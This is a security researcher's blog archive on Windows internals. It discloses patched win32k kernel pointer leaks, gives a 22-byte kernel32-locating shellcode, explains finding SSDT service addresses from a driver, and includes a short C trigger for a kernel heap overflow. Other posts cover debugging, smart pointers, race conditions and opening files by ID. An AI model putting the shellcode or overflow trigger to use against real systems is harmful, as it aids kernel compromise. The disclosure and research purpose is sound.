Archive for the ‘Win32’ Category

Win32k – Smash The Ref

Wednesday, April 1st, 2020

After a year in the making, I’m happy to publish my biggest research so far. It’s a whole bug class of vulnerabilities already patched by MSFT recently.

You can find all the POCs and the paper in my github.

Enjoy

SetWindowsHookEx Leaks A Kernel Pointer – CVE-2019-1469

Thursday, December 12th, 2019

This is another information disclosure bug I submitted a few weeks ago and was just patched by MSFT. And apparently another group of researchers found it at the same time.
The interesting thing about this bug, as of the previous info disclosure ones on my blog, is that before I found them all, I was asking myself: “How come I don’t find any information disclosure vulnerabilities?”. All I am used to find is normally potential execution vulnerabilities. And then I realized my thought-process of approaching code auditing / reverse engineering is biased toward different types of vulnerabilities, but less to the type of info leaks. And I decided I need to change what I’m looking for. And after a few days of work I found a few info leaks at once. The difference was that I realized that info leaks could be much simpler bugs (normally) and the patterns I’m used to look for, don’t normally cover info leaks.

I started to think about how code works and where kernel might pass kernel data/pointers to usermode.

It always helps me to learn previous work to get ideas and classic examples are:

  1. Data structures that have padding and alignment might contain stale/uninitialized memory and being memcpy’ed to usermode might leak data.
  2. The return value register (RAX/EAX on x64/86) might contain partial pointers once returning from a syscall (because the syscall returns void but the compiler didn’t clean the register which is always copied back to usermode).
  3. Imagine there are two subsystems in the system you’re trying to attack (say, NtUser and GDI syscalls). And then these subsystems also talk to each other in the kernel directly. Many times when NtUser calls GDI functions, it doesn’t use to check the return value, and expects to get an out parameter with some information. Now, what if you could alter the path of execution of such a GDI call from NtUser (for example, by supplying a bad HBITMAP that it will pass to the GDI subsystem). And the out parameter wasn’t initialized to begin with, and the GDI call failed, and the data is copied somehow back to usermode… happy happy joy joy. Always check return values.
  4. Also check out J00ru’s amazing work who took it to the extreme with automation.

This time our bug is different and once I figured it out, thinking how the hooking mechanism of SetWindowsHookEx works, it was trivial. Basically, for any type of events you hook in Windows, there’s 3 parameters involved in the hook procedure (passed as parameters), the event code, wparam and lparam. LPARAM is the long pointer parameter (dated from Win3.1 I believe) and contains normally a pointer to the data structure corresponding for the event code. Meaning that the kernel sends data through the lparam (which will be thunked to usermode).

But then it just occurred to me that there’s another unique type of a hook and that is the debug hook! The debug hook is a hook that will be called for any other hook procedure…

So I imagined that if the kernel passes an lparam internally before it’s being thunked, it means the debug hook sees the kernel pointer of the lparam still. And then they might forget to remove it from the lparam of the debug hook, which is the lparam of another hook procedure just about to be called.

And that worked…

In the POC I set up two hooks: the CALL-WND-PROC hook to get a window message that is sent from another thread, which has the lparam points to a data structure – now we don’t care about the info in the structure as long as it’s eventually represented by a pointer. and the second hook – the Debug, that eventually gives (leaks) the kernel pointer of the data structure of the window-create message.
And then I just SendMessage to start triggering everything.
Note that we need to hook a low level kernel-to-user-callback function that gets the raw pointer from kernel and that function eventually calls the debug procedure we passed in to SetWindowsHookEx, otherwise the pointer isn’t passed to us normally and it stays hidden.

Check it out on my github, it’s really simple.

The case of DannyDinExec – CVE-2019-1440

Wednesday, November 13th, 2019

Yet another pointer leak in the win32k driver, this time it’s a cool bug. It’s inside the DDE (Dynamic Data Exchange) component.

  1. It’s possible creating DDE objects (whatever that means) and each gets a corresponding newly created kernel window by using the NtUserDdeInitialize syscall.
  2. Internally, it adds the new DDE object to a global linked list of all such objects.
  3. In certain cases, it needs to update all DDE windows that some event occurred by sending them a message (by xxxSendMessage). Alas, this message encodes a kernel heap pointer in the LPARAM argument.

Ah ha, I thought to myself: if I manage to get the message routed to a user-mode window procedure, then the LPARAM will reveal sensitive kernel info. Profit.
Looking at the function xxxCsEvent which is the workhorse of step #3:

  1. It first converts the linked list into an array of HWNDs (not pointers, but the window-identifier) – Problem #1
  2. It then walks over the array and verifies the HWND still represents an existing window, and then it sends a DDE message to that window procedure – Problem #2

It looks something like that (which is super simplified):

count = 0;
// Query the list depth.
for (p = g_listHead; p != NULL; p = p->next) count++;
array = malloc(sizeof(HWND) * count);
// Convert the list into an array of handles.
for (i = 0, p = g_listHead; p != NULL; p = p->next, i++)
   array[i] = p->pwnd->hwnd;
// Iterate over the array and dispatch.
for (i = 0; i < count; i++)
{
  pwnd = verifywindow(array[i]);
  if (pwnd != NULL)
    xxxSendMessage(pwnd, WM_DDE_MSG, 0, kernel_ptr);
}

The way to attack this algorithm is by understanding that the kernel windows that belong to the DDE objects can be replaced during the first callback to user-mode, so the second iteration (given we created 2 DDE objects) will send a message to a window that we created from user-mode, that has exactly the same HWND (defeating problem #1 and #2), so we get the message directly from kernel, because window verification passes.

Wait, what???
If we could get the message on the first iteration to user-mode, then it's a game over already. The catch is that we can't set a user-mode window-procedure for a kernel DDE window. But we don't need to, as the DDE window procedure (xxxEventWndProc) anyway calls back to user-mode on its own by calling ClientEventCallback. Once we hook that function we're good to get control back to user-mode in the middle of the first iteration.

Now back in user-mode, we can destroy the next iterated DDE object, and it will destroy the corresponding window too, whose HWND we already know.
And now, all we have to do is to brute force to create a window that will have the same HWND, to make the verifywindow() succeed, and then xxxSendMessage sends the raw pointer to us :)

Brute forcing a HWND is very simple, because given the HWND encoding, one has to iterate exactly 16 bits space (hence, loop 0x10000 times) to get the same HWND again (over simplified again, but would work 99% of the cases). Without going into all details.

The following diagram tries to explain the flow that the attacker has to go through in order to exploit described code above:

A POC can be found on github.

IsDebuggerPresent – When To Attach a Debugger

Wednesday, October 12th, 2011

This API is really helpful sometimes. And no, I’m not talking about using it for anti-debugging, com’on.
Suppose you have a complicated application that you would like to debug on special occasions.
Two concerns arise:
1 – you don’t want to always DebugBreak() at a certain point, which will nuke the application every time the code is running at that point (because 99% of the times you don’t have a debugger attached, or it’s a release code, obviously).
2 – on the other hand, you don’t want to miss that point in execution, if you choose you want to debug it.

An example would be, to set a key in the registry that each time it will be checked and if it is set (no matter the value), the code will DebugBreak().
A similar one would be to set a timeout, that on points of your interest inside the code, it will be read and wait for that amount of time, thus giving you enough time for attaching a debugger to the process.
Or setting an environment variable to indicate the need for a DebugBreak, but that might be a pain as well, cause environment blocks are inherited from parent process, and if you set a system one, it doesn’t mean your process will be affected, etc.
Another idea I can think of is pretty obvious, to create a file in some directory, say, c:\debugme, that the application will check for existence, and if so it will wait for attaching a debugger.

What’s in common for all the approaches above? Eventually they will DebugBreak or get stuck waiting for you to do the work (attaching a debugger).

But here I’m suggesting a different flow, check that a debugger is currently present, using IsDebuggerPresent (or thousands of other tricks, why bother?) and only then fire the DebugBreak. This way you can extend it to wait in certain points for a debugger-attach.

The algorithm would be:

read timeout from registry (or check an existence of a file, or whatever you’re up to. Which is most convenient for you)
if exists, while (timeout not passed)
if IsDebuggerPresent DebugBreak()
sleep(100) – or just wait a bit not to hog CPU

That’s it, so the application would always run normally, unless there’s some value set to hint you would like to attach a debugger in certain points, and if you don’t want to, it will timeout and continue normally. Of course, it’s possible to add some log messages, you will know it’s time to attach a debugger, in case you haven’t attached it earlier…

It’s always funny to see people call MessageBox, and then they attach a debugger, they then want to set a breakpoint at some function or instruction or even straight away at the caller itself, but can’t find that place easily without symbols or expertise. Instead, put a breakpoint at the end of the MessageBox function and step out of it.

Thanks to Yuval Kokhavi for this great idea. If you have a better idea or implementation please share it with us ;)

Finding Kernel32 Base Address Shellcode

Thursday, July 7th, 2011

Yet another one…
This time, smaller, more correct, and still null-free.
I looked a bit at some shellcodes at exploit-db and googled too, to see whether anyone got a smaller way to no avail.

I based my code on:
http://skypher.com/index.php/2009/07/22/shellcode-finding-kernel32-in-windows-7/
AFAIK, who based his post on:
http://blog.harmonysecurity.com/2009_06_01_archive.html

And this is my version:

00000000 (02) 6a30                     PUSH 0x30
00000002 (01) 5e                       POP ESI
; Use DB 0x64; LODSD
00000003 (02) 64ad                     LODS EAX, [FS:ESI]
00000005 (03) 8b700c                   MOV ESI, [EAX+0xc]
00000008 (03) 8b761c                   MOV ESI, [ESI+0x1c]
0000000b (03) 8b5608                   MOV EDX, [ESI+0x8]
0000000e (04) 807e1c18                 CMP BYTE [ESI+0x1c], 0x18
00000012 (02) 8b36                     MOV ESI, [ESI]
00000014 (02) 75f5                     JNZ 0xb

The tricky part was how to read from FS:0x30, and the way I use is the smallest one, at least from what I checked.
Another issue that was fixed is the check for kernel32.dll, usually the variation of this shellcode checks for a null byte, but it turned out to be bogous on W2k machines, so it was changed to check for a null word. Getting the shellcode by a byte or two longer.

This way, it’s only 22 bytes, it doesn’t assume that kernel32.dll is the second/third entry in the list, it actually loops till it finds the correct module length (len of ‘kernel32.dll’ * 2 bytes). Also since kernelbase.dll can come first and that renders lots of implementations of this technique unusable.
And obviously the resulting base address of kernel32.dll is in EDX.

Enjoy

[Update July 9th:]
Here’s a link to an explanation about PEB/LDR lists.
See first comment for a better version which is only 17 bytes.

Calling System Service APIs in Kernel

Wednesday, January 26th, 2011

In this post I am not going to shed any new light about this topic, but I didn’t find anything like this organized in one place, so I decided to write it down, hope you will find it useful.

Sometimes when you develop a kernel driver you need to use some internal API that cannot be accessed normally through the DDK. Though you may say “but it’s not an API if it’s not officially exported and supported by MS”. Well that’s kinda true, the point is that some functions like that which are not accessible from the kernel, are really accessible from usermode, hence they are called API. After all, if you can call NtCreateFile from usermode, eventually you’re supposed to be able to do that from kernel, cause it really happens in kernel, right? Obviously, NtCreateFile is an official API in the kernel too.

When I mean using system service APIs, I really mean by doing it platform/version independent, so it will work on all versions of Windows. Except when MS changes the interface (number of parameters for instance, or their type) to the services themselves, but that rarely happens.

I am not going to explain how the architecture of the SSDT and the transitions from user to kernel or how syscalls, etc work. Just how to use it to our advantage. It is clear that MS doesn’t want you to use some of its APIs in the kernel. But sometimes it’s unavoidable, and using undocumented API is fine with me, even in production(!) if you know how to do it well and as robust as possible, but that’s another story. We know that MS doesn’t want you to use some of these APIs because a) they just don’t export it in kernel on purpose, that is. b) starting with 64 bits versions of Windows they made it harder on purpose to use or manipulate the kernel, by removing previously exported symbols from kernel, we will get to that later on.

Specifically I needed ZwProtectVirtualMemory, because I wanted to change the protection of some page in the user address space. And that function isn’t exported by the DDK, bummer. Now remember that it is accessible to usermode (as VirtualProtectMemory through kernel32.dll syscall…), therefore there ought to be a way to get it (the address of the function in kernel) in a reliable manner inside a kernel mode driver in order to use it too. And this is what I’m going to talk about in this post. I’m going to assume that you already run code in the kernel and that you are a legitimate driver because it’s really going to help us with some exported symbols, not talking about shellcodes here, although shellcodes can use this technique by changing it a bit.

We have a few major tasks in order to achieve our goal: Map the usermode equivalent .dll file. We need to get the index number of the service we want to call. Then we need to get the base address of ntos and the address of the (service) table of pointers (the SSDT itself) to the functions in the kernel. And voila…

The first one is easy both in 32 and 64 bits systems. There are mainly 3 files which make the syscalls in usermode, such as: ntdll, kernel32 and user32 (for GDI calls). For each API you want to call in kernel, you have to know its prototype and in which file you will find it (MSDN supplies some of this or just Google it). The idea is to map the file to the address space as an (executable) image. Note that the cool thing about this mapping is that you will get the address of the required file in usermode. Remember that these files are physically shared among all processes after boot time (For instance, addresses might change because of ASLR but stay consistent as long as the machine is up). Following that we will use a similar functionality to GetProcAddress, but one that you have to write yourself in kernel, which is really easy for PE and PE+ (64 bits).

Alright, so we got the image mapped, we can now get some usermode API function’s address using our GetProcAddress, now what? Well, now we have to get the index number of the syscall we want. Before I continue, this is the right place to say that I’ve seen so many approaches to this problem, disassemblers, binary patterns matching, etc. And I decided to come up with something really simple and maybe new. You take two functions that you know for sure that are going to be inside kernel32.dll (for instance), say, CreateFile and CloseHandle. And then simply compare byte after byte from both functions to find the first different byte, that byte contains the index number of the syscall (or the low byte out of the 4 bytes integer really). Probably you have no idea what I’m talking about, let me show you some usermode API’s that directly do syscalls:

XP SP3 ntdll.dll
B8 25 00 00 00                    mov     eax, 25h        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 19 00 00 00                    mov     eax, 19h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP1 32 bits ntdll.dll

B8 3C 00 00 00                    mov     eax, 3Ch        ; NtCreateFile
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 2C 00                          retn    2Ch

B8 30 00 00 00                    mov     eax, 30h        ; NtClose
BA 00 03 FE 7F                    mov     edx, 7FFE0300h
FF 12                             call    dword ptr [edx]
C2 04 00                          retn    4

Vista SP2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

2008 sp2 64 bits ntdll.dll

4C 8B D1                          mov     r10, rcx        ; NtCreateFile
B8 52 00 00 00                    mov     eax, 52h
0F 05                             syscall
C3                                retn

4C 8B D1                          mov     r10, rcx        ; NtClose
B8 0C 00 00 00                    mov     eax, 0Ch
0F 05                             syscall
C3                                retn

Win7 64bits syswow64 ntdll.dll

B8 52 00 00 00                    mov     eax, 52h        ; NtCreateFile
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 2C 00                          retn    2Ch

B8 0C 00 00 00                    mov     eax, 0Ch        ; NtClose
33 C9                             xor     ecx, ecx
8D 54 24 04                       lea     edx, [esp+arg_0]
64 FF 15 C0 00 00+                call    large dword ptr fs:0C0h
83 C4 04                          add     esp, 4
C2 04 00                          retn    4

These are a few snippets to show you how the syscall function templates look like. They are generated automatically by some tool MS wrote and they don’t change a lot as you can see from the various architectures I gathered here. Anyway, if you take a look at the bytes block of each function, you will see that you can easily spot the correct place where you can read the index of the syscall we are going to use. That’s why doing a diff on two functions from the same .dll would work well and reliably. Needless to say that we are going to use the index number we get with the table inside the kernel in order to get the corresponding function in the kernel.

This technique gives us the index number of the syscall of any exported function in any one of the .dlls mentioned above. This is valid both for 32 and 64 bits. And by the way, notice that the operand type (=immediate) that represents the index number is always a 4 bytes integer (dword) in the ‘mov’ instruction, just makes life easier.

To the next task, in order to find the base address of the service table or what is known as the system service descriptor table (in short SSDT), we will have to get the base address of the ntoskrnl.exe image first. There might be different kernel image loaded in the system (with or without PAE, uni-processor or multi-processor), but it doesn’t matter in the following technique I’m going to use, because it’s based on memory and not files… This task is really easy when you are a driver, means that if you want some exported symbol from the kernel that the DDK supplies – the PE loader will get it for you. So it means we get, without any work, the address of any function like NtClose or NtCreateFile, etc. Both are inside ntos, obviously. Starting with that address we will round down the address to the nearest page and scan downwards to find an ‘MZ’ signature, which will mark the base address of the whole image in memory. If you’re afraid from false positives using this technique you’re welcome to go further and check for a ‘PE’ signature, or use other techniques.

This should do the trick:

PVOID FindNtoskrnlBase(PVOID Addr)
{
    /// Scandown from a given symbol's address.
    Addr = (PVOID)((ULONG_PTR)Addr & ~0xfff);
    __try {
        while ((*(PUSHORT)Addr != IMAGE_DOS_SIGNATURE)) {
            Addr = (PVOID) ((ULONG_PTR)Addr - PAGE_SIZE);
        }
        return Addr;
    }
    __except(1) { }
    return NULL;
}

And you can call it with a parameter like FindNtoskrnlBase(ZwClose). This is what I meant that you know the address of ZwClose or any other symbol in the image which will give you some “anchor”.

After we got the base address of ntos, we need to retrieve the address of the service table in kernel. That can be done using the same GetProcAddress we used earlier on the mapped user mode .dll files. But this time we will be looking for the “KeServiceDescriptorTable” exported symbol.

So far you can see that we got anchors (what I call for a reliable way to get an address of anything in memory) and we are good to go, this will work in production without the need to worry. If you wanna start the flame war about the unlegitimate use of undocumented APIs, etc. I’m clearly not interested. :)
Anyway, in Windows 32 bits, the latter symbol is exported, but it is not exported in 64 bits! This is part of the PatchGuard system, to make life harder for rootkits, 3rd party drivers doing exactly what I’m talking about, etc. I’m not going to cover how to get that address in 64 bits in this post.

The KeServiceDescriptorTable is a table that holds a few pointers to other service tables which contain the real addresses of the service functions the OS supplies to usermode. So a simple dereference to the table and you get the pointer to the first table which is the one you are looking for. Using that pointer, which is really the base address of the pointers table, you use the index we read earlier from the required function and you got, at last, the pointer to that function in kernel, which you can now use.

The bottom line is that now you can use any API that is given to usermode also in kernelmode and you’re not limited to a specific Windows version, nor updates, etc. and you can do it in a reliable manner which is the most important thing. Also we didn’t require any special algorithms nor disassemblers (as much as I like diStorm…). Doing so in shellcodes make life a bit harder, because we had the assumption that we got some reliable way to find the ntos base address. But every kid around the block knows it’s easy to do it anyway.

Happy coding :)

References I found interesting about this topic:
http://j00ru.vexillium.org/?p=222
http://alter.org.ua/docs/nt_kernel/procaddr/

http://uninformed.org/index.cgi?v=3&a=4&p=5

And how to do it in 64 bits:

http://www.gamedeception.net/threads/20349-X64-Syscall-Index

Heapos Forever

Friday, August 6th, 2010

There are still hippos around us, beware:
heapo

Kernel heap overflow.

DEVMODE dm = {0};
dm.dmSize  = sizeof(DEVMODE);
dm.dmBitsPerPel = 8;
dm.dmPelsWidth = 800;
dm.dmPelsHeight = 600;
dm.dmFields = DM_PELSWIDTH | DM_PELSHEIGHT | DM_BITSPERPEL;
ChangeDisplaySettings(&dm, 0);

BITMAPINFOHEADER bmih = {0};
bmih.biClrUsed = 0x200;

HGLOBAL h = GlobalAlloc(GMEM_FIXED, 0x1000);
memcpy((PVOID)GlobalLock(h), &bmih, sizeof(bmih));
GlobalUnlock(h);

OpenClipboard(NULL);
SetClipboardData(CF_DIBV5, (HANDLE)h);
CloseClipboard();

OpenClipboard(NULL);
GetClipboardData(CF_PALETTE);


[Update, 11th Aug]: Here is MSRC response.

Race Condition From Hell, aren’t they all?

Monday, April 19th, 2010

Actually I had a trouble to come up with a good title for this post, at least one that I was satisfied with. Therefore I will start with a background story, as always.
The problem started when I had to debug a huge software which was mostly in Kernel mode. And there was this critical section (critsec from now on) synchronization object that wasn’t held always correctly. And eventually after 20 mins of trying to replicate the bug, we managed to crash the system with a NULL dereference. This variable was a global that everybody who after acquiring the critsec was its owner. Then how come we got a crash ? Simple, someone was touching the global out of it critsec scope. That’s why it was also very hard to replicate, or took very long.

The pseudo code was something like this:
Acquire Crit-Sec
g_ptr = “some structure we use”
do safe task with g_ptr

g_ptr = NULL
Release Crit-Sec

So you see, before the critsec was released the global pointer was NULLed again. Obvisouly this is totally fine, because it’s still in the scope of the acquired crit, so we can access it safely.

Looking at the crash dumps, we saw a very weird thing, but nothing surprising for those race conditions bugs. Also if you ask me, I think I would prefer dead-lock bugs to race conditions, since in dead lock, everything gets stuck and then you can examine which locks are held, and see why some thread (out of the two) is trying to acquire the lock, when it surely can’t… Not saying it’s easier, though.
Anyway, back to the crash dump, we saw that the g_ptr variable was accessed in some internal function after the critsec was acquired. So far so good. Then after a few instructions, in an inner function that referenced the variable again, suddenly it crashed. Traversing back to the point where we know by the disassembly listing of the function, where the g_ptr was touched first, we knew it worked there. Cause otherwise, it would have crashed there and then, before going on, right? I have to mention that between first time reading the variable and the second one where it crashed, we didn’t see any function calls.
This really freaked me out, because the conclusion was one – somebody else is tempering with our g_ptr in a different thread without locking the crit. If there were any function calls, might be that some of them, caused our thread to be in a Waitable state, which means we could accept APCs or other events, and then it could lead to a whole new execution path, that was hidden from the crash dump, which somehow zeroed the g_ptr variable. Also at the time of the crash, it’s important to note that the owner of the critsec was the crashing thread, no leads then to other problematic threads…

Next thing was to see that everybody touches the g_ptr only when the critsec is acquired. We surely know for now that someone is doing something very badly and we need to track the biatch down. Also we know the value that is written to the g_ptr variable is zero, so it limits the number of occurrences of such instruction (expression), which lead to two spots. Looking at both spots, everything looked fine. Of course, it looked fine, otherwise I would have spotted the bug easily, besides, we got a crash, which means, nothing is fine. Also, it’s time to admit, that part of the code was Windows itself, which made the problem a few times harder, because I couldn’t do whatever I wanted with it.

I don’t know how you guys would approach such a problem in order to solve it. But I had three ideas. Sometimes just like printf/OutputDebugPrint is your best friend, print logs when the critsec is acquired and released, who is waiting for it and just every piece of information we can gather about it. Mind you that part of it was Windows kernel itself, so we had to patch those functions too, to see, who’s acquiring the critsec and when. Luckily in debug mode, patchguard is down :) Otherwise, it would be bloody around the kernel. So looking at the log, everything was fine, again, damn. You can stare at the god damned thing for hours and tracking the acquiring and releasing pairs of the critsec, and nothing is wrong. So it means, this is not going to be the savior.

The second idea, was to comment out some code portions with #if 0 surrouding the potential problematic code. And starting to eliminate the possibilities of which function is the cause of this bug. This is not such a great idea. Since a race condition can happen in a few places, finding one of them is not enough usually. Though it can teach you something about the original bug’s characteristics, then you can look at the rest of the code to fix that same thing. It’s really old school technique but sometimes it is of a help as bad as it sounds. So guess what we did? Patched the g_ptr = NULL of the kernel and then everything went smooth, no crashes and nothing. But the problem still was around, now we knew for sure it’s our bug and not MS, duh. And there were only a few places in our code which set this g_ptr. Looking at all of them, again, seemed fine. This is where I started going crazy, seriously.

While you were reading the above ideas, didn’t you come up with the most banal idea, to put a dumb breakpoint – on memory access, on g_ptr with a condition of “who writes zero”. Of course you did, that what you should have done in the first place. I hope you know that. Why we couldn’t do that?
Because the breakpoint was fired tens of thousands times in a single second. Rendering the whole system almost to freeze. Assuming it took us 20 mins to replicate the bug, when we heavily loaded the system. Doing that with such a breakpoint set, would take days or so, no kidding. Which is out of question.

This will lead me to the next post. Stay tuned.

SmartPointer In C++

Wednesday, March 3rd, 2010

Smart pointers, the way I see it, are there to help you with, eventually, two things: saving memory and auto-destruction. There are plenty kinds of smart pointers and only one type of a dumb pointer ;) I am going talk about the one that keeps a reference count to the data. To me they are one of the most important and useful classes I have used in my code. Also the AutoResource class I posted about, here, is another type of a smart pointer. I fell in love with smart pointers as soon as I learnt about them long time ago. However I only happened to write the implementation for this concept only once, in some real product code. Most of the times I got to use libraries that supply them, like ATL and stuff. Of course, when we write code in high level languages like Python, C#, Java, etc. We are not even aware to the internal use of them, mostly anyway.

This topic is not new or anything, it is covered widely on the net, but I felt the need to share a small code snippet with my own implementation, which I wrote from scratch. It seems that in order to write this class you don’t need high skills in C++, not at all. Though if you wanna get dirty with some end cases, like the ones described in ‘More Effective c++’, you need to know the language pretty well.

As I said earlier, the smart pointer concept I’m talking about here is the one that keeps the number of references to the real instance of the object and eventually when all references are gone, it will simply delete the only real instance. Another requirement from this class is to behave like a dumb pointer (that’s just the normal pointer the language supplies), my implementation is not as perfect as the dumb pointer, in the essence of operators and the operations you can apply on the pointer. But I think for the most code usages, it will be just enough. It can be always extended, and besides if you really need a crazy ultra generic smart pointer, Boost is waiting for you.

In order to keep a reference count for the instance, we need to allocate that variable, also the instance itself, and to make sure they won’t go anywhere as long as somebody else still points to it. The catch is that if it will be a member of the SmartPointer class itself, it will die when the SmartPointer instance goes out of scope. Therefore it has to be a pointer to another object, which will hold the number of references and the real instance. Then a few smart pointers will be able to point to this core object that holds the real stuff. I think this was the only challenge in understanding how it works. The rest is a few more lines to add functionality to get the pointer, copy constructor, assignment operator and stuff.

Of course, it requires a template class, I didn’t even mention that once, because I think it’s obvious.
Here are the classes:

template  class SmartPtr {
public:
  SmartPtr(T o)
  {
    // Notice we create a DataObject that gets an object of type T.
    m_Obj = new DataObj(o);
  }
  // ... A few of additional small methods are absent from this snippet, check link below
private:
  // Now, here we define an internal class, which holds the reference count and the real object's instance.
  class DataObj {
  public:
    DataObj(T o) : m_ReferenceCount(0)
    {
      m_Ptr = new T(o); // First allocate, this time the real deal
      AddRef(); // And only then add the first reference count
    }
    unsigned int AddRef()
    {  return m_ReferenceCount++;  }
    void Release()
    {
      if (--m_ReferenceCount == 0) {
        delete m_Ptr; // Delete the instance
        delete this; // Delete the DataObj instance too
    }
  }
  T* m_Ptr; // Pointer to a single instance of T
  unsigned int m_ReferenceCount; // Number of references to the instance
 };

// This is now part of the SmartPointer class itself, you see? It points the DataObj and not T !
DataObj* m_Obj;
};

To see the full source code get it SmartPointer.txt.

I didn’t show it in the snippet above but the assignment operator or copy constructor which get a right hand of a smart pointer class, will simply copy the m_Ptr from it and add a reference to it. And by that, the ‘magic’ was done.

To support multi-thread accesses to the class, you simply need to change the AddRef method to use InterlockedAdd. And to change the Release to use InterlockedSub, ahh of course, use InterlockedAdd with -1.
And then you would be fully thread safe. Also note that you will need to use the returned value of the InterlockedAdd in the Release, rather than compare the value directly after calling the function on it. This is a common bug when writing multi-thread code. Note that if the type object you want to create using the SmartPointer doesn’t support multi-threading in the first place, nothing you can do in the smart pointer method themselves is going to solve it, of course.

I didn’t show it in the snippet again but the code supports the comparison to NULL on the SmartPointer variable. Though you won’t be able to check something like:
if (!MySmartPtr) fail… It will shout at you that the operator ! is not supported. It takes exactly 3 lines to add it.

The only problem with this implementation is that you can write back to the data directly after getting the pointer to it. For me this is not a problem cause I never do that. But if you feel it’s not good enough for you, for some reason. Check out other implementations or just read the book I mentioned earlier.

Overall it’s really a small class that gives a lot. Joy

Opening a file by ID – FILE_OPEN_BY_FILE_ID

Friday, December 25th, 2009

Sample code to open a file by its file-id. Had to use it for some tests and thought it might be useful for other people out there.

#include windows.h

typedef ULONG (__stdcall *pNtCreateFile)(
  PHANDLE FileHandle,
  ULONG DesiredAccess,
  PVOID ObjectAttributes,
  PVOID IoStatusBlock,
  PLARGE_INTEGER AllocationSize,
  ULONG FileAttributes,
  ULONG ShareAccess,
  ULONG CreateDisposition,
  ULONG CreateOptions,
  PVOID EaBuffer,
  ULONG EaLength
);

typedef ULONG (__stdcall *pNtReadFile)(
	IN HANDLE  FileHandle,
	IN HANDLE  Event  OPTIONAL,
	IN PVOID  ApcRoutine  OPTIONAL,
	IN PVOID  ApcContext  OPTIONAL,
	OUT PVOID  IoStatusBlock,
	OUT PVOID  Buffer,
	IN ULONG  Length,
	IN PLARGE_INTEGER  ByteOffset  OPTIONAL,
	IN PULONG  Key  OPTIONAL    );

typedef struct _UNICODE_STRING {
	USHORT Length, MaximumLength;
	PWCH Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

#define OBJ_CASE_INSENSITIVE					0x00000040L
#define FILE_NON_DIRECTORY_FILE                 0x00000040
#define FILE_OPEN_BY_FILE_ID                    0x00002000
#define FILE_OPEN								0x00000001

int main(int argc, char* argv[])
{
	HANDLE d = CreateFile(L"\\\\.\\c:", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0  );
	BY_HANDLE_FILE_INFORMATION i;
	HANDLE f = CreateFile(L"c:\\bla.bla", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	ULONG bla;
	WriteFile(f, "helloworld", 11, &bla, NULL);
	printf("%x, %d\n", f, GetLastError());
	GetFileInformationByHandle(f, &i);
	printf("id:%08x-%08x\n", i.nFileIndexHigh, i.nFileIndexLow);
	CloseHandle(f);

	pNtCreateFile NtCreatefile = (pNtCreateFile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateFile");
	pNtReadFile NtReadFile = (pNtReadFile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtReadFile");

	ULONG fid[2] = {i.nFileIndexLow, i.nFileIndexHigh};
	UNICODE_STRING fidstr = {8, 8, (PWSTR) fid};

	OBJECT_ATTRIBUTES oa = {0};
    InitializeObjectAttributes (&oa, &fidstr, OBJ_CASE_INSENSITIVE, d, NULL);

    ULONG iosb[2];
    ULONG status = NtCreatefile(&f, GENERIC_ALL, &oa, iosb, NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, FILE_OPEN_BY_FILE_ID | FILE_NON_DIRECTORY_FILE, NULL, 0);
	printf("status: %X, handle: %x\n", status, f);
	UCHAR buf[11] = {0};
	LONG Off[2] = {0};
	status = NtReadFile(f, NULL, NULL, NULL, (PVOID)&iosb, (PVOID)buf, sizeof(buf), (PLARGE_INTEGER)&Off, NULL);
	printf("status: %X, bytes: %d\n", status, iosb[1]);
	printf("buf: %s\n", buf);
	CloseHandle(f);
	CloseHandle(d);
}